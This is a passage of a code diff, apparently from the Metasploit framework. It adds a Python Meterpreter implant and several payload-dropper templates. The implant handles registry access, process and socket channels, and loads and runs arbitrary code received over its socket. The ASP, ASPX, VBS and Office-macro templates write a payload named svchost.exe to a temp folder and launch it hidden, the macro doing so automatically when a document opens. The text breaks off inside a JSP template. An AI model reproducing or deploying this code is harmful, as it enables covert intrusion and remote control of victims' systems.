+		if result == ERROR_MORE_DATA:
743
+			if tries > 3:
744
+				break
745
+			name = (ctypes.c_char * (ctypes.sizeof(name) * 2))
746
+			tries += 1
747
+			continue
748
+		elif result == ERROR_NO_MORE_ITEMS:
749
+			result = ERROR_SUCCESS
750
+			break
751
+		elif result != ERROR_SUCCESS:
752
+			break
753
+		tries = 0
754
+		response += tlv_pack(TLV_TYPE_KEY_NAME, ctypes.string_at(name))
755
+		index += 1
756
+	return result, response
757
+
758
+@meterpreter.register_function_windll
759
+def stdapi_registry_enum_value(request, response):
760
+	ERROR_MORE_DATA = 0xea
761
+	ERROR_NO_MORE_ITEMS = 0x0103
762
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
763
+	name = (ctypes.c_char * 4096)()
764
+	name_sz = ctypes.c_uint32()
765
+	index = 0
766
+	tries = 0
767
+	while True:
768
+		name_sz.value = ctypes.sizeof(name)
769
+		result = ctypes.windll.advapi32.RegEnumValueA(hkey, index, name, ctypes.byref(name_sz), None, None, None, None)
770
+		if result == ERROR_MORE_DATA:
771
+			if tries > 3:
772
+				break
773
+			name = (ctypes.c_char * (ctypes.sizeof(name) * 3))
774
+			tries += 1
775
+			continue
776
+		elif result == ERROR_NO_MORE_ITEMS:
777
+			result = ERROR_SUCCESS
778
+			break
779
+		elif result != ERROR_SUCCESS:
780
+			break
781
+		tries = 0
782
+		response += tlv_pack(TLV_TYPE_VALUE_NAME, ctypes.string_at(name))
783
+		index += 1
784
+	return result, response
785
+
786
+@meterpreter.register_function_windll
787
+def stdapi_registry_load_key(request, response):
788
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)
789
+	sub_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)
790
+	file_name = packet_get_tlv(request, TLV_TYPE_FILE_PATH)
791
+	result = ctypes.windll.advapi32.RegLoadKeyA(root_key, sub_key, file_name)
792
+	return result, response
793
+
794
+@meterpreter.register_function_windll
795
+def stdapi_registry_open_key(request, response):
796
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
797
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
798
+	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
799
+	handle_id = ctypes.c_void_p()
800
+	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
801
+		response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
802
+		return ERROR_SUCCESS, response
803
+	return ERROR_FAILURE, response
804
+
805
+@meterpreter.register_function_windll
806
+def stdapi_registry_open_remote_key(request, response):
807
+	target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
808
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
809
+	result_key = ctypes.c_void_p()
810
+	result = ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key))
811
+	if (result == ERROR_SUCCESS):
812
+		response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
813
+		return ERROR_SUCCESS, response
814
+	return ERROR_FAILURE, response
815
+
816
+@meterpreter.register_function_windll
817
+def stdapi_registry_query_class(request, response):
818
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
819
+	value_data = (ctypes.c_char * 4096)()
820
+	value_data_sz = ctypes.c_uint32()
821
+	value_data_sz.value = ctypes.sizeof(value_data)
822
+	result = ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None)
823
+	if result == ERROR_SUCCESS:
824
+		response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
825
+		return ERROR_SUCCESS, response
826
+	return ERROR_FAILURE, response
827
+
828
+@meterpreter.register_function_windll
829
+def stdapi_registry_query_value(request, response):
830
+	REG_SZ = 1
831
+	REG_DWORD = 4
832
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
833
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
834
+	value_type = ctypes.c_uint32()
835
+	value_type.value = 0
836
+	value_data = (ctypes.c_ubyte * 4096)()
837
+	value_data_sz = ctypes.c_uint32()
838
+	value_data_sz.value = ctypes.sizeof(value_data)
839
+	result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
840
+	if result == ERROR_SUCCESS:
841
+		response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
842
+		if value_type.value == REG_SZ:
843
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
844
+		elif value_type.value == REG_DWORD:
845
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
846
+		else:
847
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
848
+		return ERROR_SUCCESS, response
849
+	return ERROR_FAILURE, response
850
+
851
+@meterpreter.register_function_windll
852
+def stdapi_registry_set_value(request, response):
853
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
854
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
855
+	value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
856
+	value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
857
+	result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
858
+	return result, response
859
+
860
+@meterpreter.register_function_windll
861
+def stdapi_registry_unload_key(request, response):
862
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
863
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
864
+	result = ctypes.windll.advapi32.RegUnLoadKeyA(root_key, base_key)
865
+	return result, response

BIN
data/meterpreter/ext_server_stdapi.x64.dll View File


BIN
data/meterpreter/ext_server_stdapi.x86.dll View File


BIN
data/meterpreter/meterpreter.jar View File


+ 415
- 0
data/meterpreter/meterpreter.py View File

@@ -0,0 +1,415 @@
1
+#!/usr/bin/python
2
+import code
3
+import ctypes
4
+import os
5
+import random
6
+import select
7
+import socket
8
+import struct
9
+import subprocess
10
+import sys
11
+import threading
12
+
13
+has_windll = hasattr(ctypes, 'windll')
14
+
15
+#
16
+# Constants
17
+#
18
+PACKET_TYPE_REQUEST = 0
19
+PACKET_TYPE_RESPONSE = 1
20
+PACKET_TYPE_PLAIN_REQUEST = 10
21
+PACKET_TYPE_PLAIN_RESPONSE = 11
22
+
23
+ERROR_SUCCESS = 0
24
+# not defined in original C implementation
25
+ERROR_FAILURE = 1
26
+
27
+CHANNEL_CLASS_BUFFERED = 0
28
+CHANNEL_CLASS_STREAM = 1
29
+CHANNEL_CLASS_DATAGRAM = 2
30
+CHANNEL_CLASS_POOL = 3
31
+
32
+#
33
+# TLV Meta Types
34
+#
35
+TLV_META_TYPE_NONE =       (   0   )
36
+TLV_META_TYPE_STRING =     (1 << 16)
37
+TLV_META_TYPE_UINT =       (1 << 17)
38
+TLV_META_TYPE_RAW =        (1 << 18)
39
+TLV_META_TYPE_BOOL =       (1 << 19)
40
+TLV_META_TYPE_COMPRESSED = (1 << 29)
41
+TLV_META_TYPE_GROUP =      (1 << 30)
42
+TLV_META_TYPE_COMPLEX =    (1 << 31)
43
+# not defined in original
44
+TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
45
+
46
+#
47
+# TLV base starting points
48
+#
49
+TLV_RESERVED =   0
50
+TLV_EXTENSIONS = 20000
51
+TLV_USER =       40000
52
+TLV_TEMP =       60000
53
+
54
+#
55
+# TLV Specific Types
56
+#
57
+TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
58
+TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
59
+TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
60
+TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
61
+TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
62
+
63
+TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
64
+TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
65
+TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
66
+
67
+TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
68
+TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
69
+TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
70
+
71
+TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
72
+TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
73
+TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
74
+TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
75
+TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
76
+
77
+TLV_TYPE_SEEK_WHENCE =         TLV_META_TYPE_UINT   |  70
78
+TLV_TYPE_SEEK_OFFSET =         TLV_META_TYPE_UINT   |  71
79
+TLV_TYPE_SEEK_POS =            TLV_META_TYPE_UINT   |  72
80
+
81
+TLV_TYPE_EXCEPTION_CODE =      TLV_META_TYPE_UINT   | 300
82
+TLV_TYPE_EXCEPTION_STRING =    TLV_META_TYPE_STRING | 301
83
+
84
+TLV_TYPE_LIBRARY_PATH =        TLV_META_TYPE_STRING | 400
85
+TLV_TYPE_TARGET_PATH =         TLV_META_TYPE_STRING | 401
86
+TLV_TYPE_MIGRATE_PID =         TLV_META_TYPE_UINT   | 402
87
+TLV_TYPE_MIGRATE_LEN =         TLV_META_TYPE_UINT   | 403
88
+
89
+TLV_TYPE_CIPHER_NAME =         TLV_META_TYPE_STRING | 500
90
+TLV_TYPE_CIPHER_PARAMETERS =   TLV_META_TYPE_GROUP  | 501
91
+
92
+def generate_request_id():
93
+	chars = 'abcdefghijklmnopqrstuvwxyz'
94
+	return ''.join(random.choice(chars) for x in xrange(32))
95
+
96
+def packet_get_tlv(pkt, tlv_type):
97
+	offset = 0
98
+	while (offset < len(pkt)):
99
+		tlv = struct.unpack('>II', pkt[offset:offset+8])
100
+		if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
101
+			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
102
+			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
103
+				val = val.split('\x00', 1)[0]
104
+			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
105
+				val = struct.unpack('>I', val)[0]
106
+			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
107
+				val = bool(struct.unpack('b', val)[0])
108
+			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
109
+				pass
110
+			return {'type':tlv[1], 'length':tlv[0], 'value':val}
111
+		offset += tlv[0]
112
+	return {}
113
+
114
+def tlv_pack(*args):
115
+	if len(args) == 2:
116
+		tlv = {'type':args[0], 'value':args[1]}
117
+	else:
118
+		tlv = args[0]
119
+	data = ""
120
+	if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
121
+		data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
122
+	elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
123
+		data = struct.pack('>III', 12, tlv['type'], tlv['value'])
124
+	elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
125
+		data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
126
+	elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
127
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
128
+	elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
129
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
130
+	elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
131
+		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
132
+	return data
133
+
134
+class STDProcessBuffer(threading.Thread):
135
+	def __init__(self, std, is_alive):
136
+		threading.Thread.__init__(self)
137
+		self.std = std
138
+		self.is_alive = is_alive
139
+		self.data = ''
140
+		self.data_lock = threading.RLock()
141
+
142
+	def run(self):
143
+		while self.is_alive():
144
+			byte = self.std.read(1)
145
+			self.data_lock.acquire()
146
+			self.data += byte
147
+			self.data_lock.release()
148
+		data = self.std.read()
149
+		self.data_lock.acquire()
150
+		self.data += data
151
+		self.data_lock.release()
152
+
153
+	def is_read_ready(self):
154
+		return len(self.data) != 0
155
+
156
+	def read(self, l = None):
157
+		data = ''
158
+		self.data_lock.acquire()
159
+		if l == None:
160
+			data = self.data
161
+			self.data = ''
162
+		else:
163
+			data = self.data[0:l]
164
+			self.data = self.data[l:]
165
+		self.data_lock.release()
166
+		return data
167
+
168
+class STDProcess(subprocess.Popen):
169
+	def __init__(self, *args, **kwargs):
170
+		subprocess.Popen.__init__(self, *args, **kwargs)
171
+
172
+	def start(self):
173
+		self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
174
+		self.stdout_reader.start()
175
+		self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
176
+		self.stderr_reader.start()
177
+
178
+class PythonMeterpreter(object):
179
+	def __init__(self, socket):
180
+		self.socket = socket
181
+		self.extension_functions = {}
182
+		self.channels = {}
183
+		self.interact_channels = []
184
+		self.processes = {}
185
+		for func in filter(lambda x: x.startswith('_core'), dir(self)):
186
+			self.extension_functions[func[1:]] = getattr(self, func)
187
+		self.running = True
188
+
189
+	def register_function(self, func):
190
+		self.extension_functions[func.__name__] = func
191
+
192
+	def register_function_windll(self, func):
193
+		if has_windll:
194
+			self.register_function(func)
195
+
196
+	def add_channel(self, channel):
197
+		idx = 0
198
+		while idx in self.channels:
199
+			idx += 1
200
+		self.channels[idx] = channel
201
+		return idx
202
+
203
+	def add_process(self, process):
204
+		idx = 0
205
+		while idx in self.processes:
206
+			idx += 1
207
+		self.processes[idx] = process
208
+		return idx
209
+
210
+	def run(self):
211
+		while self.running:
212
+			if len(select.select([self.socket], [], [], 0.5)[0]):
213
+				request = self.socket.recv(8)
214
+				if len(request) != 8:
215
+					break
216
+				req_length, req_type = struct.unpack('>II', request)
217
+				req_length -= 8
218
+				request = ''
219
+				while len(request) < req_length:
220
+					request += self.socket.recv(4096)
221
+				response = self.create_response(request)
222
+				self.socket.send(response)
223
+			else:
224
+				channels_for_removal = []
225
+				channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
226
+				for channel_id in channel_ids:
227
+					channel = self.channels[channel_id]
228
+					data = ''
229
+					if isinstance(channel, STDProcess):
230
+						if not channel_id in self.interact_channels:
231
+							continue
232
+						if channel.stdout_reader.is_read_ready():
233
+							data = channel.stdout_reader.read()
234
+						elif channel.stderr_reader.is_read_ready():
235
+							data = channel.stderr_reader.read()
236
+						elif channel.poll() != None:
237
+							self.handle_dead_resource_channel(channel_id)
238
+					elif isinstance(channel, socket._socketobject):
239
+						while len(select.select([channel.fileno()], [], [], 0)[0]):
240
+							try:
241
+								d = channel.recv(1)
242
+							except socket.error:
243
+								d = ''
244
+							if len(d) == 0:
245
+								self.handle_dead_resource_channel(channel_id)
246
+								break
247
+							data += d
248
+					if data:
249
+						pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
250
+						pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
251
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
252
+						pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
253
+						pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
254
+						pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
255
+						pkt  = struct.pack('>I', len(pkt) + 4) + pkt
256
+						self.socket.send(pkt)
257
+
258
+	def handle_dead_resource_channel(self, channel_id):
259
+		del self.channels[channel_id]
260
+		if channel_id in self.interact_channels:
261
+			self.interact_channels.remove(channel_id)
262
+		pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
263
+		pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
264
+		pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
265
+		pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
266
+		pkt  = struct.pack('>I', len(pkt) + 4) + pkt
267
+		self.socket.send(pkt)
268
+
269
+	def _core_loadlib(self, request, response):
270
+		data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
271
+		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
272
+			return ERROR_FAILURE
273
+		preloadlib_methods = self.extension_functions.keys()
274
+		i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
275
+		i.runcode(compile(data_tlv['value'], '', 'exec'))
276
+		postloadlib_methods = self.extension_functions.keys()
277
+		new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
278
+		for method in new_methods:
279
+			response += tlv_pack(TLV_TYPE_METHOD, method)
280
+		return ERROR_SUCCESS, response
281
+
282
+	def _core_shutdown(self, request, response):
283
+		response += tlv_pack(TLV_TYPE_BOOL, True)
284
+		self.running = False
285
+		return ERROR_SUCCESS, response
286
+
287
+	def _core_channel_open(self, request, response):
288
+		channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
289
+		handler = 'channel_create_' + channel_type['value']
290
+		if handler not in self.extension_functions:
291
+			return ERROR_FAILURE, response
292
+		handler = self.extension_functions[handler]
293
+		return handler(request, response)
294
+
295
+	def _core_channel_close(self, request, response):
296
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
297
+		if channel_id not in self.channels:
298
+			return ERROR_FAILURE, response
299
+		channel = self.channels[channel_id]
300
+		if isinstance(channel, file):
301
+			channel.close()
302
+		elif isinstance(channel, subprocess.Popen):
303
+			channel.kill()
304
+		elif isinstance(s, socket._socketobject):
305
+			channel.close()
306
+		else:
307
+			return ERROR_FAILURE, response
308
+		del self.channels[channel_id]
309
+		if channel_id in self.interact_channels:
310
+			self.interact_channels.remove(channel_id)
311
+		return ERROR_SUCCESS, response
312
+
313
+	def _core_channel_eof(self, request, response):
314
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
315
+		if channel_id not in self.channels:
316
+			return ERROR_FAILURE, response
317
+		channel = self.channels[channel_id]
318
+		result = False
319
+		if isinstance(channel, file):
320
+			result = channel.tell() == os.fstat(channel.fileno()).st_size
321
+		response += tlv_pack(TLV_TYPE_BOOL, result)
322
+		return ERROR_SUCCESS, response
323
+
324
+	def _core_channel_interact(self, request, response):
325
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
326
+		if channel_id not in self.channels:
327
+			return ERROR_FAILURE, response
328
+		channel = self.channels[channel_id]
329
+		toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
330
+		if toggle:
331
+			if channel_id in self.interact_channels:
332
+				self.interact_channels.remove(channel_id)
333
+			else:
334
+				self.interact_channels.append(channel_id)
335
+		elif channel_id in self.interact_channels:
336
+			self.interact_channels.remove(channel_id)
337
+		return ERROR_SUCCESS, response
338
+
339
+	def _core_channel_read(self, request, response):
340
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
341
+		length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
342
+		if channel_id not in self.channels:
343
+			return ERROR_FAILURE, response
344
+		channel = self.channels[channel_id]
345
+		data = ''
346
+		if isinstance(channel, file):
347
+			data = channel.read(length)
348
+		elif isinstance(channel, STDProcess):
349
+			if channel.poll() != None:
350
+				self.handle_dead_resource_channel(channel_id)
351
+			if channel.stdout_reader.is_read_ready():
352
+				data = channel.stdout_reader.read(length)
353
+		elif isinstance(s, socket._socketobject):
354
+			data = channel.recv(length)
355
+		else:
356
+			return ERROR_FAILURE, response
357
+		response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
358
+		return ERROR_SUCCESS, response
359
+
360
+	def _core_channel_write(self, request, response):
361
+		channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
362
+		channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
363
+		length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
364
+		if channel_id not in self.channels:
365
+			return ERROR_FAILURE, response
366
+		channel = self.channels[channel_id]
367
+		l = len(channel_data)
368
+		if isinstance(channel, file):
369
+			channel.write(channel_data)
370
+		elif isinstance(channel, subprocess.Popen):
371
+			if channel.poll() != None:
372
+				self.handle_dead_resource_channel(channel_id)
373
+				return ERROR_FAILURE, response
374
+			channel.stdin.write(channel_data)
375
+		elif isinstance(s, socket._socketobject):
376
+			try:
377
+				l = channel.send(channel_data)
378
+			except socket.error:
379
+				channel.close()
380
+				self.handle_dead_resource_channel(channel_id)
381
+				return ERROR_FAILURE, response
382
+		else:
383
+			return ERROR_FAILURE, response
384
+		response += tlv_pack(TLV_TYPE_LENGTH, l)
385
+		return ERROR_SUCCESS, response
386
+
387
+	def create_response(self, request):
388
+		resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
389
+		method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
390
+		resp += tlv_pack(method_tlv)
391
+
392
+		reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
393
+		resp += tlv_pack(reqid_tlv)
394
+
395
+		handler_name = method_tlv['value']
396
+		if handler_name in self.extension_functions:
397
+			handler = self.extension_functions[handler_name]
398
+			try:
399
+				#print("[*] running method {0}".format(handler_name))
400
+				result, resp = handler(request, resp)
401
+			except Exception, err:
402
+				#print("[-] method {0} resulted in an error".format(handler_name))
403
+				result = ERROR_FAILURE
404
+		else:
405
+			#print("[-] method {0} was requested but does not exist".format(handler_name))
406
+			result = ERROR_FAILURE
407
+		resp += tlv_pack(TLV_TYPE_RESULT, result)
408
+		resp = struct.pack('>I', len(resp) + 4) + resp
409
+		return resp
410
+
411
+if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
412
+	if hasattr(os, 'setsid'):
413
+		os.setsid()
414
+	met = PythonMeterpreter(s)
415
+	met.run()

BIN
data/meterpreter/metsrv.dll View File


BIN
data/meterpreter/metsrv.x64.dll View File


BIN
data/meterpreter/metsrv.x86.dll View File


BIN
data/meterpreter/screenshot.dll View File


BIN
data/meterpreter/screenshot.x64.dll View File


BIN
data/meterpreter/screenshot.x86.dll View File


+ 24
- 0
data/templates/scripts/to_exe.asp.template View File

@@ -0,0 +1,24 @@
1
+<%% @language="VBScript" %%>
2
+<%% 
3
+	Sub %{var_func}()
4
+		%{var_shellcode}
5
+		Dim %{var_obj}
6
+		Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
7
+		Dim %{var_stream}
8
+		Dim %{var_tempdir}
9
+		Dim %{var_tempexe}
10
+		Dim %{var_basedir}
11
+		Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
12
+		%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
13
+		%{var_obj}.CreateFolder(%{var_basedir})
14
+		%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
15
+		Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0)
16
+		%{var_stream}.Write %{var_bytes}
17
+		%{var_stream}.Close
18
+		Dim %{var_shell}
19
+		Set %{var_shell} = CreateObject("Wscript.Shell")
20
+		%{var_shell}.run %{var_tempexe}, 0, false
21
+	End Sub
22
+
23
+	%{var_func}
24
+%%>

+ 30
- 0
data/templates/scripts/to_exe.aspx.template View File

@@ -0,0 +1,30 @@
1
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
2
+<%%@ Import Namespace="System.IO" %%>
3
+<script runat="server">
4
+	protected void Page_Load(object sender, EventArgs e)
5
+	{
6
+		%{shellcode}
7
+		string %{var_tempdir} = Path.GetTempPath();
8
+		string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
9
+		string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
10
+		
11
+		Directory.CreateDirectory(%{var_basedir});
12
+		
13
+		FileStream fs = File.Create(%{var_tempexe});
14
+		
15
+		try
16
+		{
17
+			fs.Write(%{var_file}, 0, %{var_file}.Length);
18
+		}
19
+		finally
20
+		{
21
+			if (fs != null) ((IDisposable)fs).Dispose();
22
+		}
23
+
24
+		System.Diagnostics.Process %{var_proc} = new System.Diagnostics.Process();
25
+		%{var_proc}.StartInfo.CreateNoWindow = true;
26
+		%{var_proc}.StartInfo.UseShellExecute = true;
27
+		%{var_proc}.StartInfo.FileName = %{var_tempexe};
28
+		%{var_proc}.Start();
29
+	}
30
+</script>

+ 81
- 0
data/templates/scripts/to_exe.vba.template View File

@@ -0,0 +1,81 @@
1
+'**************************************************************
2
+'*
3
+'* This code is now split into two pieces:
4
+'*  1. The Macro. This must be copied into the Office document
5
+'*     macro editor. This macro will run on startup.
6
+'*
7
+'*  2. The Data. The hex dump at the end of this output must be
8
+'*     appended to the end of the document contents.
9
+'*
10
+'**************************************************************
11
+'*
12
+'* MACRO CODE
13
+'*
14
+'**************************************************************
15
+
16
+Sub Auto_Open()
17
+	%{func_name1}
18
+End Sub
19
+
20
+Sub %{func_name1}()
21
+	Dim %{var_appnr} As Integer
22
+	Dim %{var_fname} As String
23
+	Dim %{var_fenvi} As String
24
+	Dim %{var_fhand} As Integer
25
+	Dim %{var_parag} As Paragraph
26
+	Dim %{var_index} As Integer
27
+	Dim %{var_gotmagic} As Boolean
28
+	Dim %{var_itemp} As Integer
29
+	Dim %{var_stemp} As String
30
+	Dim %{var_btemp} As Byte
31
+	Dim %{var_magic} as String
32
+	%{var_magic} = "%{var_magic}"
33
+	%{var_fname} = "%{filename}.exe"
34
+	%{var_fenvi} = Environ("USERPROFILE")
35
+	ChDrive (%{var_fenvi})
36
+	ChDir (%{var_fenvi})
37
+	%{var_fhand} = FreeFile()
38
+	Open %{var_fname} For Binary As %{var_fhand}
39
+	For Each %{var_parag} in ActiveDocument.Paragraphs
40
+		DoEvents
41
+			%{var_stemp} = %{var_parag}.Range.Text
42
+		If (%{var_gotmagic} = True) Then
43
+			%{var_index} = 1
44
+			While (%{var_index} < Len(%{var_stemp}))
45
+				%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
46
+				Put #%{var_fhand}, , %{var_btemp}
47
+				%{var_index} = %{var_index} + 4
48
+			Wend
49
+		ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
50
+			%{var_gotmagic} = True
51
+		End If
52
+	Next
53
+	Close #%{var_fhand}
54
+	%{func_name2}(%{var_fname})
55
+End Sub
56
+
57
+Sub %{func_name2}(%{var_farg} As String)
58
+	Dim %{var_appnr} As Integer
59
+	Dim %{var_fenvi} As String
60
+	%{var_fenvi} = Environ("USERPROFILE")
61
+	ChDrive (%{var_fenvi})
62
+	ChDir (%{var_fenvi})
63
+	%{var_appnr} = Shell(%{var_farg}, vbHide)
64
+End Sub
65
+
66
+Sub AutoOpen()
67
+	Auto_Open
68
+End Sub
69
+
70
+Sub Workbook_Open()
71
+	Auto_Open
72
+End Sub
73
+
74
+'**************************************************************
75
+'*
76
+'* PAYLOAD DATA
77
+'*
78
+'**************************************************************
79
+
80
+%{var_magic}
81
+%{data}

+ 24
- 0
data/templates/scripts/to_exe.vbs.template View File

@@ -0,0 +1,24 @@
1
+Function %{var_func}()
2
+%{var_shellcode}
3
+
4
+	Dim %{var_obj}
5
+	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
6
+	Dim %{var_stream}
7
+	Dim %{var_tempdir}
8
+	Dim %{var_tempexe}
9
+	Dim %{var_basedir}
10
+	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
11
+	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
12
+	%{var_obj}.CreateFolder(%{var_basedir})
13
+	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
14
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
15
+	%{var_stream}.Write %{var_bytes}
16
+	%{var_stream}.Close
17
+	Dim %{var_shell}
18
+	Set %{var_shell} = CreateObject("Wscript.Shell")
19
+	%{var_shell}.run %{var_tempexe}, 0, true
20
+	%{var_obj}.DeleteFile(%{var_tempexe})
21
+	%{var_obj}.DeleteFolder(%{var_basedir})
22
+End Function
23
+
24
+%{init}

+ 49
- 0
data/templates/scripts/to_exe_jsp.war.template View File

@@ -0,0 +1,49 @@
1
+<%%@ page import="java.io.*" %%>
2
+<%%
3
+	String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
4
+	String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
5
+	String %{var_data} = "";
6
+
7
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
8
+	{
9
+		%{var_exepath} = %{var_exepath}.concat(".exe");
10
+	}
11
+
12
+	FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
13
